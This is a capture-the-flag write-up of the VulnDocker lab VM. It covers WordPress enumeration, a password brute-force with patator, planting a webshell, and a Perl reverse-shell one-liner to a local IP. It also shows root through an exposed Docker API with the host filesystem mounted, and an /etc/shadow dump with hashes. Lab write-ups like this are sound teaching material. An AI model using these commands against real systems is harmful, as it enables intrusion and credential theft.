A new VM is released by NotSoSecure company called VulnDocker. What a coincidence, you’re auditing docker security trying to learn and understand and a vm appears as challenge flavour. Perfect.

On boot we can see the modes (yes, VM has two modes):

• HARD: This would require you to combine your docker skills as well as your pen-testing skills to achieve host compromise.
• EASY: Relatively easier path, knowing docker would be enough to compromise the machine and gain root on the host machines.

So i take Hard one at first and after nmap scan with penmap.sh (with automatized html report) only 22 and 8000 ports appears to be open. An SSH service and a wordpress is a good start for pentesters, isn’t it ? ;)

And behind port 8000, a WordPress 4.8.1 (last version at this post’s date). Nothing new.

Next step is update and use wpscan to see superficially if there’s any bug around in plugins, core or whatever, and something more important enumerating users. 

$ wpscan --url http://192.168.1.8:8000/ --enumerate
[+] robots.txt available under: 'http://192.168.1.8:8000/robots.txt'
[+] Interesting entry from robots.txt: http://192.168.1.8:8000/wp-admin/admin-ajax.php
[!] The WordPress 'http://192.168.1.8:8000/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in 'http://192.168.1.8:8000/wp-includes/rss-functions.php': 
[+] Interesting header: LINK: <http://192.168.1.8:8000/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.10 (Debian)
[+] Interesting header: X-POWERED-BY: PHP/5.6.31
[+] XML-RPC Interface available under: http://192.168.1.8:8000/xmlrpc.php

[+] Identified the following 1 user/s:
    +----+-------+-----------------+
    | Id | Login | Name            |
    +----+-------+-----------------+
    | 1  | bob   | bob – NotSoEasy |
    +----+-------+-----------------+

There’s one user identified and WordPress version, among other full path disclosure and server version. So it smells like we have to gain access to that account and upload a little shell to continue our adventures. Let’s try some wordlist as password, it’s time to patator, our favourite http (multipurpose) brute-fuzzer.

 $ python patator.py http_fuzz url=http://192.168.1.8:8000/wp-login.php  raw_request=rawlogin 0=/usr/share/rockyou.txt -l /tmp/login

A bit explain for arguments:

url - url schema 
http_fuzz - type of brutefuzzing 
raw_request - just take the HTTP request on a raw file and pass it to patator. 
0 - password file, rockyou in this case 
-l some login files. 

Contents of raw request with user bob and FILE0 as password content per request.

POST /wp-login.php HTTP/1.1
Host: 192.168.1.8:8000
Content-Length: 100
Cache-Control: max-age=0
Origin: http://192.168.1.8:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64)
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.8:8000/wp-login.php
Accept-Language: es-ES,es;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
log=bob&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.8%3A8000%2Fwp-admin%2F&testcookie=1

We have to search for HTTP/1.1 302 (redirect) on patator to see if any of the rockyou password has been successfully access. It seems «Welcome1» is the good one for bob user.

Good, have a way to plant a webshell. We can use the 404.php page for any of our themes.

Now, let’s open a reverse shell (nc -l -p 8081) from webshell with:

perl -e 'use Socket;$i="192.168.1.4";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Serching for posts and appear flag_1 in http://192.168.1.8:8000/2017/01/19/flag_1/ as a draft.

2aa11783d05b6a329ffc4d2a1ce037f46162253e55d53764a6a7e998

good job finding this one. Now Lets hunt for the other flags

hint: they are in files.

On easy mode i have discovered that docker has a socket on 2375 that allow send docker commands. This means that if we run alpine image with /bin/sh, we will be root. First, nmap shows the opened port on host.

Starting Nmap 7.31 ( https://nmap.org ) at 2017-08-24 15:05 Hora de verano romance
Nmap scan report for 192.168.1.8
Host is up (0.00s latency).
PORT     STATE SERVICE
2375/tcp open  docker

Let’s see containers with ps

$ docker -H tcp://192.168.1.8:2375 ps
CONTAINER ID        IMAGE                      COMMAND                CREATED             STATUS                  PORTS                  NAMES
8f4bca8ef241        wordpress:latest           "docker-entrypoint.s   46 hours ago        Up Less than a second   0.0.0.0:8000->80/tcp   content_wordpress_1   
13f0a3bb2706        mysql:5.7                  "docker-entrypoint.s   46 hours ago        Up Less than a second   3306/tcp               content_db_1          
b90babce1037        jeroenpeeters/docker-ssh   "npm start"            7 days ago          Up Less than a second   22/tcp, 8022/tcp       content_ssh_1   

Now, we can run alpine image to get root.

$ docker -H tcp://192.168.1.8:2375 run -itv /:/host alpine /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

We can reach /host files previously not shown on our shell and get flag_3

$ /host # cat flag_3
d867a73c70770e73b65e6949dd074285dfdee80a8db333a7528390f6

Awesome so you reached host

Well done

Now the bigger challenge try to understand and fix the bugs.

If you want more attack targets look at the shadow file and try cracking passwords :P

Thanks for playing the challenges we hope you enjoyed all levels

You can send your suggestions bricks bats criticism or appreciations 
on vulndocker@notsosecure.com 

As indicate on the flag_3 message we can try to crack /etc/shadow. So let’s try and easy mode will be done.

cat /host/etc/shadow
root:$6$i8GUrrmW$GE/x1EEwKgMvvTS0IuOfd4jkrP9ufQrYxBdvAXh72ETmC.PZv.0gzb9Fxfs2y5CxmKiJlRUJVr5p0k3TxgPEG0:17394:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:17392:0:99999:7:::
landscape:*:17392:0:99999:7:::
sshd:*:17392:0:99999:7:::
whale:$6$RvS0tNRs$gV2mxTeBwobOo9h1LZ59aGb1Gy7E83.2Lb5IsmPupTKxLqfoLAMLAKPMskQ1s52puOQoXzuLhrhM.j7TkTAxp1:17394:0:99999:7:::

Update: flag_2 is really missing on this writeup and all others i have read, so maybe notsosecure can give us more light and say were it is. Or maybe they have put it on a jpg image (facepalm).